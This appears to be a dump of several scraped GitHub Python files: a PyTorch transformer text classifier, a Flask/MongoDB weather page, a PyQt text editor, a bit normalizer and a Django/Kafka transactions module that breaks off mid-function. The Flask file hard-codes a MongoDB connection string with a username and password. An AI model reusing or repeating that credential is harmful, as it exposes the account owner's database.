path\")\nparser.add_argument(\"-d\", \"--data_dir\", type=str, help=\"data path\")\nparser.add_argument(\"--train\", type=str,\n help=\"train file name\", default='train.txt')\nparser.add_argument(\"--test\", type=str,\n help=\"test file name\", default='test.txt')\nparser.add_argument(\"--validate\", type=str,\n help=\"validate file path\", default='validate.txt')\nparser.add_argument(\"--device\", type=str, help=\"cuda device number\", default=0)\nparser.add_argument(\"--num_words\", type=int,\n help=\"cuda device number\", default=None)\nparser.add_argument(\"--batch_size\", type=int,\n help=\"cuda device number\", 
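# NB: this help string is a copy-paste slip; the flag actually sets the training batch size\n                    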
default=1024)\nparser.add_argument(\"--dropout\", type=float,\n help=\"cuda device number\", default=0.1)\nparser.add_argument(\"--lr\", type=float,\n help=\"cuda device number\", default=0.001)\nparser.add_argument(\"--word_split\", type=bool,\n help=\"use ninja word splitter\", default=False)\nparser.add_argument(\"--replace_nums\", type=bool,\n help=\"replace numbers with words\", default=False)\nargs = parser.parse_args()\nprint(args)\n\n\nprint(torch.__version__)\ntorch.cuda.is_available()\n\n\ndata_dir = args.data_dir\ndscb_train_fn = args.train\ndscb_validate_fn = args.validate\ndscb_test_fn = args.test\n\ndevice = torch.device(\n \"cuda:\"+args.device if torch.cuda.is_available() else \"cpu\")\n\n\ndef charNGramtokenizer(sentence, n=3):\n return [sentence[i:i+n] for i in range(len(sentence)-n+1)]\n\n\ndef wordTokenizer(sentence):\n return sentence.split()\n\n\ndef normalizedWordTokenizer(sentence, word_split, replace_nums):\n sentence = normalize(sentence, args.word_split, args.replace_nums)\n return sentence.split()\n\n\ndef save_vocab(vocab, path):\n import pickle\n output = open(path, 'wb')\n pickle.dump(vocab, output)\n output.close()\n\n\ndscb_train = pd.read_csv(os.path.join(\n data_dir, dscb_test_fn), sep='\\x01', dtype=str)\n\nmax_len = 100\n\ntext = Field(sequential=True, tokenize=normalizedWordTokenizer,\n fix_length=max_len, batch_first=True, lower=True, dtype=torch.long)\ndscb = Field(sequential=False, dtype=torch.long)\ndsc = Field(sequential=False, dtype=torch.long)\nb = Field(sequential=False, dtype=torch.long)\n\nfields = []\nfor col in dscb_train.columns:\n if col == \"cleaned_description\":\n fields.append((\"text\", text))\n elif col == \"dscb\":\n fields.append((\"dscb\", dscb))\n elif col == \"dsc\":\n fields.append((\"dsc\", dsc))\n elif col == \"omni_brand_id\":\n fields.append((\"b\", b))\n else:\n fields.append((col, None))\n\n\nclass TabularDataset(Dataset):\n \"\"\"Defines a Dataset of columns stored in CSV, TSV, or JSON format.\"\"\"\n\n def __init__(self, path, format, fields, skip_header=False,\n csv_reader_params={}, **kwargs):\n \"\"\"Create a TabularDataset given a path, file format, and field list.\n Arguments:\n path (str): Path to the data file.\n format (str): The format of the data file. 
One of \"CSV\", \"TSV\", or\n \"JSON\" (case-insensitive).\n fields (list(tuple(str, Field)) or dict[str: tuple(str, Field)]:\n If using a list, the format must be CSV or TSV, and the values of the list\n should be tuples of (name, field).\n The fields should be in the same order as the columns in the CSV or TSV\n file, while tuples of (name, None) represent columns that will be ignored.\n If using a dict, the keys should be a subset of the JSON keys or CSV/TSV\n columns, and the values should be tuples of (name, field).\n Keys not present in the input dictionary are ignored.\n This allows the user to rename columns from their JSON/CSV/TSV key names\n and also enables selecting a subset of columns to load.\n skip_header (bool): Whether to skip the first line of the input file.\n csv_reader_params(dict): Parameters to pass to the csv reader.\n Only relevant when format is csv or tsv.\n See\n https://docs.python.org/3/library/csv.html#csv.reader\n for more details.\n \"\"\"\n format = format.lower()\n make_example = {\n 'json': Example.fromJSON, 'dict': Example.fromdict,\n 'tsv': Example.fromCSV, 'csv': Example.fromCSV,\n '\\x01': Example.fromCSV}[format]\n\n with io.open(os.path.expanduser(path), encoding=\"utf8\") as f:\n if format == 'csv':\n reader = unicode_csv_reader(f, **csv_reader_params)\n elif format == 'tsv':\n reader = unicode_csv_reader(\n f, delimiter='\\t', **csv_reader_params)\n elif format == '\\x01':\n reader = unicode_csv_reader(\n f, delimiter='\\x01', **csv_reader_params)\n else:\n reader = f\n\n if format in ['csv', 'tsv', '\\x01'] and isinstance(fields, dict):\n if skip_header:\n raise ValueError('When using a dict to specify fields with a {} file,'\n 'skip_header must be False and'\n 'the file must have a header.'.format(format))\n header = next(reader)\n field_to_index = {f: header.index(f) for f in fields.keys()}\n make_example = partial(\n make_example, field_to_index=field_to_index)\n\n if skip_header:\n next(reader)\n\n examples = [make_example(line, fields) for line in reader]\n\n if isinstance(fields, dict):\n fields, field_dict = [], fields\n for field in field_dict.values():\n if isinstance(field, list):\n fields.extend(field)\n else:\n fields.append(field)\n\n super(TabularDataset, self).__init__(examples, fields, **kwargs)\n\n\nds_train, ds_valid, ds_test = TabularDataset.splits(\n path=args.data_dir,\n train=args.train,\n validation=args.validate,\n test=args.test,\n format='\\x01',\n skip_header=True,\n fields=fields)\n\nprint('train : ', len(ds_train))\nprint('test : ', len(ds_test))\nprint('train.fields :', ds_train.fields)\n\nif args.num_words is None:\n num_words = None\nelse:\n num_words = args.num_words\n\ntext.build_vocab(ds_train, max_size=num_words, specials=['', ''])\ndscb.build_vocab(ds_train)\ndsc.build_vocab(ds_train)\nb.build_vocab(ds_train)\nvocab = text.vocab\n\nprint(len(dscb.vocab.itos))\n\nif not os.path.exists('vocab'):\n os.makedirs('vocab')\n\nif not os.path.exists('models'):\n os.makedirs('models')\n\nsave_vocab(text.vocab, 'vocab/cleaned_description_'+args.model_name+'.pkl')\nsave_vocab(dscb.vocab, 'vocab/dscb_cleaned_desc_'+args.model_name+'.pkl')\nsave_vocab(dsc.vocab, 'vocab/dsc_cleaned_desc_'+args.model_name+'.pkl')\nsave_vocab(b.vocab, 'vocab/b_cleaned_desc_'+args.model_name+'.pkl')\n\nif args.batch_size is None:\n batch_size = 1024\nelse:\n batch_size = args.batch_size\n\ntrain_loader, valid_loader, test_loader = BucketIterator.splits(\n (ds_train, ds_valid, ds_test), batch_size=batch_size, sort_key=lambda x: len(x.text), 
repeat=False)\n\nnn_Softargmax = nn.Softmax # fix wrong name\n\n\nclass MultiHeadAttention(nn.Module):\n def __init__(self, d_model, num_heads, p, d_input=None):\n super().__init__()\n self.num_heads = num_heads\n self.d_model = d_model\n if d_input is None:\n d_xq = d_xk = d_xv = d_model\n else:\n d_xq, d_xk, d_xv = d_input\n\n # Make sure that the embedding dimension of model is a multiple of number of heads\n assert d_model % self.num_heads == 0\n\n self.d_k = d_model // self.num_heads\n\n # These are still of dimension d_model. They will be split into number of heads\n self.W_q = nn.Linear(d_xq, d_model, bias=False)\n self.W_k = nn.Linear(d_xk, d_model, bias=False)\n self.W_v = nn.Linear(d_xv, d_model, bias=False)\n\n # Outputs of all sub-layers need to be of dimension d_model\n self.W_h = nn.Linear(d_model, d_model)\n\n def scaled_dot_product_attention(self, Q, K, V):\n batch_size = Q.size(0)\n k_length = K.size(-2)\n\n # Scaling by d_k so that the soft(arg)max doesnt saturate\n # (bs, n_heads, q_length, dim_per_head)\n Q = Q / np.sqrt(self.d_k)\n # (bs, n_heads, q_length, k_length)\n scores = torch.matmul(Q, K.transpose(2, 3))\n\n A = nn_Softargmax(dim=-1)(scores) # (bs, n_heads, q_length, k_length)\n\n # Get the weighted average of the values\n H = torch.matmul(A, V) # (bs, n_heads, q_length, dim_per_head)\n\n return H, A\n\n def split_heads(self, x, batch_size):\n \"\"\"\n Split the last dimension into (heads X depth)\n Return after transpose to put in shape (batch_size X num_heads X seq_length X d_k)\n \"\"\"\n return x.view(batch_size, -1, self.num_heads, self.d_k).transpose(1, 2)\n\n def group_heads(self, x, batch_size):\n \"\"\"\n Combine the heads again to get (batch_size X seq_length X num_heads X d_k)\n \"\"\"\n return x.transpose(1, 2).contiguous().view(batch_size, -1, self.num_heads * self.d_k)\n\n def forward(self, X_q, X_k, X_v):\n batch_size, seq_length, dim = X_q.size()\n\n # After transforming, split into num_heads\n # (bs, n_heads, q_length, dim_per_head)\n Q = self.split_heads(self.W_q(X_q), batch_size)\n # (bs, n_heads, k_length, dim_per_head)\n K = self.split_heads(self.W_k(X_k), batch_size)\n # (bs, n_heads, k_length, dim_per_head)\n V = self.split_heads(self.W_v(X_v), batch_size)\n\n # Calculate the attention weights for each of the heads\n H_cat, A = self.scaled_dot_product_attention(Q, K, V)\n\n # Put all the heads back together by concat\n H_cat = self.group_heads(H_cat, batch_size) # (bs, q_length, dim)\n\n # Final linear layer\n H = self.W_h(H_cat) # (bs, q_length, dim)\n\n return H, A\n\n\nclass CNN(nn.Module):\n def __init__(self, d_model, hidden_dim, p):\n super().__init__()\n self.k1convL1 = nn.Linear(d_model, hidden_dim)\n self.dropout1 = nn.Dropout(p=p)\n self.k1convL2 = nn.Linear(hidden_dim, d_model)\n self.activation = nn.ReLU()\n\n def forward(self, x):\n x = self.k1convL1(x)\n x = self.activation(x)\n x = self.dropout1(x)\n x = self.k1convL2(x)\n return x\n\n\nclass EncoderLayer(nn.Module):\n def __init__(self, d_model, num_heads, conv_hidden_dim, p=0.1):\n super().__init__()\n\n self.mha = MultiHeadAttention(d_model, num_heads, p)\n self.cnn = CNN(d_model, conv_hidden_dim, p)\n\n self.layernorm1 = nn.LayerNorm(normalized_shape=d_model, eps=1e-6)\n self.layernorm2 = nn.LayerNorm(normalized_shape=d_model, eps=1e-6)\n\n def forward(self, x):\n\n # Multi-head attention\n # (batch_size, input_seq_len, d_model)\n attn_output, _ = self.mha(x, x, x)\n\n # Layer norm after adding the residual connection\n # (batch_size, input_seq_len, d_model)\n out1 = 
self.layernorm1(x + attn_output)\n\n # Feed forward\n cnn_output = self.cnn(out1) # (batch_size, input_seq_len, d_model)\n\n # Second layer norm after adding residual connection\n # (batch_size, input_seq_len, d_model)\n out2 = self.layernorm2(out1 + cnn_output)\n\n return out2\n\n\ndef create_sinusoidal_embeddings(nb_p, dim, E):\n theta = np.array([\n [p / np.power(10000, 2 * (j // 2) / dim) for j in range(dim)]\n for p in range(nb_p)\n ])\n E[:, 0::2] = torch.FloatTensor(np.sin(theta[:, 0::2]))\n E[:, 1::2] = torch.FloatTensor(np.cos(theta[:, 1::2]))\n E.detach_()\n E.requires_grad = False\n E = E.to(device)\n\n\nclass Embeddings(nn.Module):\n def __init__(self, d_model, vocab_size, max_position_embeddings, p):\n super().__init__()\n self.word_embeddings = nn.Embedding(vocab_size, d_model, padding_idx=1)\n self.position_embeddings = nn.Embedding(\n max_position_embeddings, d_model)\n create_sinusoidal_embeddings(\n nb_p=max_position_embeddings,\n dim=d_model,\n E=self.position_embeddings.weight\n )\n\n self.LayerNorm = nn.LayerNorm(d_model, eps=1e-12)\n\n def forward(self, input_ids):\n seq_length = input_ids.size(1)\n position_ids = torch.arange(\n seq_length, dtype=torch.long, device=input_ids.device) # (max_seq_length)\n position_ids = position_ids.unsqueeze(0).expand_as(\n input_ids) # (bs, max_seq_length)\n\n # Get word embeddings for each input id\n word_embeddings = self.word_embeddings(\n input_ids) # (bs, max_seq_length, dim)\n\n # Get position embeddings for each position id\n position_embeddings = self.position_embeddings(\n position_ids) # (bs, max_seq_length, dim)\n\n # Add them both\n embeddings = word_embeddings + \\\n position_embeddings # (bs, max_seq_length, dim)\n\n # Layer norm\n # (bs, max_seq_length, dim)\n embeddings = self.LayerNorm(embeddings)\n return embeddings\n\n\nclass Encoder(nn.Module):\n def __init__(self, num_layers, d_model, num_heads, ff_hidden_dim, input_vocab_size,\n maximum_position_encoding, p=0.1):\n super().__init__()\n\n self.d_model = d_model\n self.num_layers = num_layers\n\n self.embedding = Embeddings(\n d_model, input_vocab_size, maximum_position_encoding, p)\n\n self.enc_layers = nn.ModuleList()\n for _ in range(num_layers):\n self.enc_layers.append(EncoderLayer(\n d_model, num_heads, ff_hidden_dim, p))\n\n def forward(self, x):\n # Transform to (batch_size, input_seq_length, d_model)\n x = self.embedding(x)\n\n for i in range(self.num_layers):\n x = self.enc_layers[i](x)\n\n return x # (batch_size, input_seq_len, d_model)\n\n\nclass TransformerClassifier(nn.Module):\n def __init__(self, num_layers, d_model, num_heads, conv_hidden_dim, input_vocab_size, num_answers):\n super().__init__()\n\n self.encoder = Encoder(num_layers, d_model, num_heads, conv_hidden_dim, input_vocab_size,\n maximum_position_encoding=10000)\n self.dropout = nn.Dropout(p=0.2)\n self.dense = nn.Linear(d_model, num_answers)\n\n def forward(self, x):\n x = self.encoder(x)\n\n x, _ = torch.max(x, dim=1)\n x = self.dropout(x)\n x = self.dense(x)\n return x\n\n\nclass TransformerClassifierDSCB(nn.Module):\n def __init__(self, num_layers, d_model, num_heads, conv_hidden_dim, input_vocab_size, num_dsc, num_b, p):\n super().__init__()\n\n self.encoder = Encoder(num_layers, d_model, num_heads, conv_hidden_dim, input_vocab_size,\n maximum_position_encoding=10000)\n self.dropout = nn.Dropout(p=p)\n self.dense = nn.Linear(d_model, num_dsc)\n self.dense1 = nn.Linear(d_model, num_b)\n\n def forward(self, x):\n x = self.encoder(x)\n x, _ = torch.max(x, dim=1)\n x = self.dropout(x)\n 
x0 = self.dense(x)\n x1 = self.dense1(x)\n return x0, x1\n\n\nclass TransformerClassifierHrclDSCB(nn.Module):\n def __init__(self, num_layers, d_model, num_heads, conv_hidden_dim, input_vocab_size, num_d, num_s, num_c, num_b, p):\n super().__init__()\n\n self.encoder = Encoder(num_layers, d_model, num_heads, conv_hidden_dim, input_vocab_size,\n maximum_position_encoding=10000)\n self.dropout = nn.Dropout(p=p)\n self.dense0 = nn.Linear(d_model, num_d)\n self.dense1 = nn.Linear(d_model+num_d, num_s)\n self.dense2 = nn.Linear(d_model+num_d+num_s, num_c)\n self.dense3 = nn.Linear(d_model+num_d+num_s+num_c, num_b)\n\n def forward(self, x):\n x = self.encoder(x)\n x, _ = torch.max(x, dim=1)\n x = self.dropout(x)\n\n x_d = self.dense0(x)\n x_s = self.dense1(torch.cat((x, x_d), 1))\n x_c = self.dense2(torch.cat((x, x_d, x_s), 1))\n x_b = self.dense3(torch.cat((x, x_d, x_s, x_c), 1))\n return x_d, x_s, x_c, x_b\n\n\nnum_dsc = len(dsc.vocab.itos)\nnum_b = len(b.vocab.itos)\nnum_words = len(text.vocab.itos)\n\nmodel = TransformerClassifierDSCB(num_layers=2, d_model=128, num_heads=8,\n conv_hidden_dim=128, input_vocab_size=num_words+2,\n num_dsc=num_dsc, num_b=num_b, p=args.dropout)\nmodel.to(device)\n\noptimizer = torch.optim.AdamW(model.parameters(), lr=args.lr)\nepochs = 100\nt_total = len(train_loader) * epochs\n\nscheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer,\n mode='min',\n factor=0.1,\n patience=3,\n verbose=True)\n\n\ndef trainDSCB(train_loader, valid_loader):\n\n best_loss = 10**100\n\n for epoch in range(epochs):\n train_iterator, valid_iterator = iter(train_loader), iter(valid_loader)\n train_acc_dsc = 0\n train_acc_b = 0\n train_acc = 0\n model.train()\n losses = 0.0\n\n for idx, batch in enumerate(train_iterator):\n x = batch.text.to(device)\n y_dsc = batch.dsc.to(device)\n y_b = batch.b.to(device)\n\n out = model(x) # ①\n\n loss = f.cross_entropy(out[0], y_dsc) + \\\n f.cross_entropy(out[1], y_b) # ②\n\n model.zero_grad() # ③\n\n loss.backward() # ④\n losses += loss.item()\n\n optimizer.step() # ⑤\n\n train_acc_dsc += (out[0].argmax(1) == y_dsc).cpu().numpy().mean()\n train_acc_b += (out[1].argmax(1) == y_b).cpu().numpy().mean()\n train_acc += ((out[0].argmax(1) == y_dsc) &\n (out[1].argmax(1) == y_b)).cpu().numpy().mean()\n\n print(f\"Training loss at epoch {epoch} is {losses/idx}\")\n print(f\"Training accuracy for DSC: {train_acc_dsc/idx}\")\n print(f\"Training accuracy for B: {train_acc_b/idx}\")\n print(f\"Training accuracy: {train_acc/idx}\")\n print('Evaluating on validation:')\n\n model.eval()\n acc_dsc = 0\n acc_b = 0\n acc = 0\n val_losses = 0.0\n for idx, batch in enumerate(valid_iterator):\n x = batch.text.to(device)\n y_dsc = batch.dsc.to(device)\n y_b = batch.b.to(device)\n\n out = model(x)\n loss = f.cross_entropy(out[0], y_dsc) + \\\n f.cross_entropy(out[1], y_b)\n val_losses += loss.item()\n acc_dsc += (out[0].argmax(1) == y_dsc).cpu().numpy().mean()\n acc_b += (out[1].argmax(1) == y_b).cpu().numpy().mean()\n acc += ((out[0].argmax(1) == y_dsc) &\n (out[1].argmax(1) == y_b)).cpu().numpy().mean()\n\n print(f\"Validation accuracy for DSC: {acc_dsc/idx}\")\n print(f\"Validation accuracy for B: {acc_b/idx}\")\n print(f\"Validation accuracy: {acc/idx}\")\n\n if val_losses < best_loss:\n print('Updating best model')\n best_loss = copy.deepcopy(val_losses)\n best_model = copy.deepcopy(model)\n torch.save(best_model.state_dict(),\n 'models/'+args.model_name)\n\n scheduler.step(loss.item())\n\n return best_model\n\n\ndef evaluateDSCB(data_loader, best_model):\n 
data_iterator = iter(data_loader)\n\n best_model.eval()\n acc_dsc = 0\n acc_b = 0\n acc = 0\n\n for idx, batch in enumerate(data_iterator):\n x = batch.text.to(device)\n y_dsc = batch.dsc.to(device)\n y_b = batch.b.to(device)\n\n out = model(x)\n loss = f.cross_entropy(out[0], y_dsc) + f.cross_entropy(out[1], y_b)\n\n acc_dsc += (out[0].argmax(1) == y_dsc).cpu().numpy().mean()\n acc_b += (out[1].argmax(1) == y_b).cpu().numpy().mean()\n acc += ((out[0].argmax(1) == y_dsc) &\n (out[1].argmax(1) == y_b)).cpu().numpy().mean()\n\n print(f\"Eval accuracy for DSC: {acc_dsc/idx}\")\n print(f\"Eval accuracy for B: {acc_b/idx}\")\n print(f\"Eval accuracy: {acc/idx}\")\n\n\nif __name__ == '__main__':\n best_model = trainDSCB(train_loader, valid_loader)\n print('Evaluating on test:')\n evaluateDSCB(test_loader, best_model)\n","repo_name":"shr264/transformer-text-classfier","sub_path":"transformer_classfier.py","file_name":"transformer_classfier.py","file_ext":"py","file_size_in_byte":21525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16285347365","text":"import collections\nimport copy\nfrom .Utils import _write_complex_object\n\nclass Location(object):\n \"\"\"Data contract class for type Location.\n \"\"\"\n _defaults = collections.OrderedDict([\n ('ai.location.ip', None)\n ])\n \n def __init__(self):\n \"\"\"Initializes a new instance of the class.\n \"\"\"\n self._values = {\n }\n self._initialize()\n \n @property\n def ip(self):\n \"\"\"The ip property.\n \n Returns:\n (string). the property value. (defaults to: None)\n \"\"\"\n if 'ai.location.ip' in self._values:\n return self._values['ai.location.ip']\n return self._defaults['ai.location.ip']\n \n @ip.setter\n def ip(self, value):\n \"\"\"The ip property.\n \n Args:\n value (string). the property value.\n \"\"\"\n if value == self._defaults['ai.location.ip'] and 'ai.location.ip' in self._values:\n del self._values['ai.location.ip']\n else:\n self._values['ai.location.ip'] = value\n \n def _initialize(self):\n \"\"\"Initializes the current instance of the object.\n \"\"\"\n pass\n \n def write(self):\n \"\"\"Writes the contents of this object and returns the content as a dict object.\n \n Returns:\n (dict). 
 the object that represents the same data as the current instance.\n        \"\"\"\n        return _write_complex_object(self._defaults, self._values)\n\n","repo_name":"EnjoyLifeFund/macHighSierra-cellars","sub_path":"azure-cli/2.0.18/libexec/lib/python3.6/site-packages/applicationinsights/channel/contracts/Location.py","file_name":"Location.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"}
+{"seq_id":"13821595194","text":"from flask import Flask, render_template\nfrom flask_pymongo import PyMongo\n\n\napp = Flask(__name__)\n\napp.config['MONGO_URI'] = 'mongodb://Aline1:aline1@ds061355.mlab.com:61355/heroku_njkl5bj0'\nmongo = PyMongo(app)\n\n# Weather fields copied verbatim from each MongoDB document\nFIELDS = [\n    'absolute_humidity_2m:gm3', 'clear_sky_rad:W', 'dew_point_2m:C',\n    'diffuse_rad:W', 'diffuse_rad_1h:Ws', 'direct_rad:W', 'direct_rad_1h:Ws',\n    'dust_0p03um_0p55um:ugm3', 'dust_0p55um_0p9um:ugm3', 'dust_0p9um_20um:ugm3',\n    'effective_cloud_cover:p', 'fresh_snow_1h:cm', 'frost_depth:cm',\n    'global_rad:W', 'global_rad_1h:Ws', 'high_cloud_cover:p', 'is_fog_1h:idx',\n    'is_rain_1h:idx', 'is_sleet_1h:idx', 'is_snow_1h:idx', 'low_cloud_cover:p',\n    'medium_cloud_cover:p', 'neff:p', 'pm1:ugm3', 'pm2p5:ugm3', 'precip_1h:mm',\n    'prob_precip_1h:p', 'relative_humidity_2m:p', 'sfc_pressure_mean_1h:hPa',\n    'snowdepth:cm', 'snow_melt_1h:mm', 'sunrise:sql', 'sunset:sql',\n    'sunshine_duration_1h:min', 't_0m:C', 't_2m:C', 't_max_0m_1h:C',\n    't_mean_0m_1h:C', 't_min_0m_1h:C', 'total_cloud_cover:p', 'wet_bulb_t_2m:C',\n    'wind_dir_10m:d', 'wind_dir_mean_10m_1h:d', 'wind_gusts_10m:ms',\n    'wind_speed_10m:ms', 'wind_speed_mean_10m_1h:ms', 'wind_speed_u_10m:ms',\n    'wind_speed_v_10m:ms'\n]\n\n@app.route(\"/\")\ndef get_time():\n    time = mongo.db.time_record\n    # Every entry of the original dict literal had the same 'key': t['key']\n    # shape (and one key was duplicated), so it is replaced by a\n    # comprehension over FIELDS\n    output = [{k: t[k] for k in FIELDS} for t in time.find()]\n    return render_template('index.html', result=output)\n\n\nif __name__ == \"__main__\":\n    app.run(debug=True)","repo_name":"ajaimes07/shared","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"13748631555","text":"from functools import reduce\n\n\nclass Normalizer(object):\n    def __init__(self):\n        self.mask = [\n            0x1, 0x2, 0x4, 0x8, 0x10, 0x20, 0x40, 0x80\n        ]\n\n    def norm(self, number):
\n        # Return a list instead of a one-shot map object so callers can\n        # index and re-iterate the result\n        return [0.9 if number & m else 0.1 for m in self.mask]\n\n    def denorm(self, vec):\n        bits = [1 if v > 0.5 else 0 for v in vec]\n        weighted = [bit * m for bit, m in zip(bits, self.mask)]\n        return reduce(lambda x, y: x + y, weighted)\n\n","repo_name":"chris1132/Py_Projects_git","sub_path":"my_deeplearning_algorithm/bp/NormalizerClass.py","file_name":"NormalizerClass.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"35839912320","text":"# mathesis.cup.gr\n# N. Αβούρης: Introduction to Python\n# Lesson 12. Functions\n\n'''12.3 Write a program that calls a function\nthat counts the uppercase and lowercase letters in a phrase.\n'''\n\ndef count_capital_small(s):\n    count_capital = 0\n    count_small = 0\n    for c in s:\n        if c.isalpha():\n            if c.lower() == c:\n                count_small += 1\n            else:\n                count_capital += 1\n    return count_capital, count_small\n\nst = input(\"phrase:\")\nprint(count_capital_small(st))\n","repo_name":"navouris/python_mathesis_course","sub_path":"code/week3/12_functions/12_3.py","file_name":"12_3.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"el","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"}
+{"seq_id":"19490269769","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import QFont\nfrom PyQt5 import uic\n\nclass SHcode(QMainWindow):\n    def __init__(self):\n        super(SHcode, self).__init__()\n        uic.loadUi('SHcode.ui', self)\n        self.show()\n\n        self.setWindowTitle(\"SHcode\")\n\n        # change font size\n        self.action12pt.triggered.connect(lambda: self.change_size(12))\n        self.action18pt.triggered.connect(lambda: self.change_size(18))\n        self.action24pt.triggered.connect(lambda: self.change_size(24))\n\n        # file actions\n        self.actionopen.triggered.connect(self.open_file)\n        self.actionsave.triggered.connect(self.save_file)\n        self.actionclose.triggered.connect(exit)\n\n    def change_size(self, size):\n        self.plainTextEdit.setFont(QFont(\"Arial\", size))\n\n    def open_file(self):\n        options = QFileDialog.Options()\n        filename, _ = QFileDialog.getOpenFileName(\n            self,\n            \"Open File\",\n            \"\",\n            \"Text Files (*.txt);;Python Files (*.py);;Yolang Files (*.yo)\",\n            options=options\n        )\n        if filename != \"\":\n            with open(filename, \"r\") as f:\n                self.plainTextEdit.setPlainText(f.read())\n\n    def save_file(self):\n        options = QFileDialog.Options()\n        filename, _ = QFileDialog.getSaveFileName(\n            self,\n            \"Save File\",\n            \"\",\n            \"Text Files (*.txt);;Python Files (*.py);;Yolang Files (*.yo);;All Files(*)\",\n            options=options\n        )\n        if filename != \"\":\n            with open(filename, \"w\") as f:\n                f.write(self.plainTextEdit.toPlainText())\n\n    def closeEvent(self, event):\n        dialog = QMessageBox()\n        dialog.setText(\"Do you want to save your file?\")\n\n        # add buttons\n        dialog.addButton(QPushButton(\"yes\"), QMessageBox.YesRole)  # 0\n        dialog.addButton(QPushButton(\"no\"), QMessageBox.NoRole)  # 1\n        dialog.addButton(QPushButton(\"cancel\"), QMessageBox.RejectRole)  # 2\n\n        answer = dialog.exec_()\n\n        if answer == 0:\n            self.save_file()\n        elif answer == 2:\n            event.ignore()\n\ndef main():\n    app = QApplication([])\n    window = SHcode()\n    app.exec_()\n\nif __name__ == '__main__':\n    main()\n","repo_name":"shahriaarrr/SHcode","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"}
+{"seq_id":"35317818375","text":"import uuid\nfrom decimal import Decimal\nfrom http.client import OK\nfrom typing import List, Optional\n\nfrom django.conf import settings\nfrom django.db import IntegrityError\nfrom notbank.transactions.models.current_deposit import CurrentDeposit\nfrom notbank.base.exceptions import (ConversionAlreadyRunningException, DepositAlreadyRunningException, QuoteNotFoundException, NotBankKafkaException,\n TransferRequestAlreadyCommitedException,\n TransferRequestNotFoundException, UserNotFoundException)\nfrom notbank.base.utils.kafka.producer import Producer\nfrom notbank.base.utils.kafka.tramas.nanobanco_quote import NanoBancoQuote\nfrom notbank.base.utils.time import datetime_from_timestamp, get_timestamp\nfrom notbank.transactions.models import (\n CurrentConversion, CurrentTransfer, Quote, Transfer, TransferRequest, User)\nfrom notbank.transactions.models.conversion import Conversion\n\n\ndef new_transfer(\n from_user: str,\n to_user: str,\n currency: str,\n amount: str,\n fee_amount: str,\n description: str\n) -> str:\n transfer = Transfer(\n created_at=datetime_from_timestamp(get_timestamp()),\n task_id=str(uuid.uuid4()),\n from_user=User.objects.get(uuid=from_user),\n to_user=User.objects.get(uuid=to_user),\n currency=currency,\n amount=amount,\n fee_amount=fee_amount,\n description=description,\n )\n CurrentTransfer(task_id=transfer.task_id).save()\n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_NOTBANK_SYNC_TOPIC,\n message=transfer.to_sync_task_trama())\n if not sended:\n raise NotBankKafkaException(\n \"failed to send to notbank-sync kafka topic\")\n\n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_BALANCE_MANAGER_TASK_TOPIC,\n message=transfer.to_balance_manager_task_trama()\n )\n if not sended:\n raise NotBankKafkaException(\n \"failed to send to balance-manager-task kafka topic\")\n return transfer.task_id\n\n\ndef get_conversion(\n from_user_uuid: str,\n from_asset: str,\n from_amount: str,\n to_asset: str,\n fee_amount: str\n) -> str:\n trama_data = NanoBancoQuote(\n timestamp=get_timestamp(),\n django_user_ID=from_user_uuid,\n from_currency=from_asset,\n to_currency=to_asset,\n from_amount=from_amount,\n request_id=str(uuid.uuid4()),\n fee_amount=fee_amount,\n )\n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_QUOTE_SERVICE_NANOBANCO_QUOTE,\n message=trama_data.to_trama())\n if not sended:\n raise NotBankKafkaException(\n \"failed to send to TODO:SOME-TOPIC kafka topic\") # TODO: not use some topic\n\n\ndef execute_conversion(*, user_uuid: str, request_id: str, fee_amount: str, description: str):\n try:\n CurrentConversion(request_id=request_id).save()\n except IntegrityError:\n raise ConversionAlreadyRunningException()\n try:\n quote: Quote = Quote.objects.get(request_id=request_id)\n # TODO: should be deleted in all instances (in a task after sync)\n except Quote.DoesNotExist:\n raise QuoteNotFoundException()\n try:\n user = User.objects.get(uuid=user_uuid)\n except User.DoesNotExist:\n raise UserNotFoundException()\n conversion = Conversion(\n task_id=uuid.uuid4(),\n user=user,\n from_currency=quote.from_currency,\n from_amount=quote.from_amount,\n to_currency=quote.to_currency,\n fee_amount=Decimal(fee_amount),\n description=description,\n )\n sended = Producer.send_kafka_message(\n topic=settings.KAFKA_NOTBANK_SYNC_TOPIC,\n message=conversion.to_sync_task_trama())\n if not sended:\n raise NotBankKafkaException(\n \"failed to send to notbank-sync kafka topic\")\n sended = 
 Producer.send_kafka_message(\n        topic=settings.KAFKA_BALANCE_MANAGER_TASK_TOPIC,\n        message=conversion.to_balance_manager_task_trama())\n    if not sended:\n        raise NotBankKafkaException(\n            \"failed to send to balance-manager-task kafka topic\")\n    return conversion.task_id\n\n\ndef deposit(*, user_uuid: str, request_id: str, currency: str, amount: str, fee: str):\n    # NOTE: `currency` and `amount` are accepted but unused; the conversion is\n    # built entirely from the stored quote, mirroring execute_conversion()\n    try:\n        CurrentDeposit(request_id=request_id).save()\n    except IntegrityError:\n        raise DepositAlreadyRunningException()\n    try:\n        quote: Quote = Quote.objects.get(request_id=request_id)\n        # TODO: should be deleted in all instances (in a task after sync)\n    except Quote.DoesNotExist:\n        raise QuoteNotFoundException()\n    try:\n        user = User.objects.get(uuid=user_uuid)\n    except User.DoesNotExist:\n        raise UserNotFoundException()\n    conversion = Conversion(\n        task_id=uuid.uuid4(),\n        user=user,\n        from_currency=quote.from_currency,\n        from_amount=quote.from_amount,\n        to_currency=quote.to_currency,\n        